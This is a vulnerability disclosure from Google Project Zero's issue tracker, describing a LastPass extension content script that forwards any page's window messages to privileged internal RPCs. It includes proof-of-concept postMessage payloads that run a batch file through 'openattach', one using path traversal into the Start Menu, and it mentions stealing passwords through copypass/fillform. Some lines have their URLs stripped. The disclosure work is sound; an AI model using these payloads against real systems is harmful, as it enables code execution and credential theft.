Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 1209 LastPass: websiteConnector.js content script allows proxying internal RPC commands
Starred by 10 users Project Member Reported by, Mar 20 Back to list
Status: Fixed
Closed: Mar 21

Sign in to add a comment
I noticed this entry in the content_script array from the LastPass manifest:

			"matches": [
			"js": [
			"all_frames": true,
			"run_at": "document_end"

That's a content script that is only used for one specific domain, if we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
window.addEventListener("message", function(e) { || chrome.runtime.sendMessage(, function(e) {});

That doesn't look good, this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win ="");
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc). If you install the binary component (, you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Windows 7-2017-03-20-16-14-27.png
104 KB View Download
Comment 1 Deleted
Project Member Comment 2 by, Mar 21
Ah, this version is better, it works without a prompt on Windows 10:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force lastpass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)
Comment 3 Deleted
Project Member Comment 4 by, Mar 21
LastPass responded and said they have NXDOMAIN'd while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling seems like a good enough mitigation for now.
Project Member Comment 5 by, Mar 21
Labels: -Restrict-View-Commit
Status: Fixed
I've uploaded the exploit here:

It looks like LastPass now consider this issue resolved:

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses. 

Additionally, if any corporate intercepting ssl proxy is returning custom error pages for NXDOMAIN then this might still be exploitable, you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note, issue 1188 which affects LastPass on firefox is not fixed, and still works)
Sign in to add a comment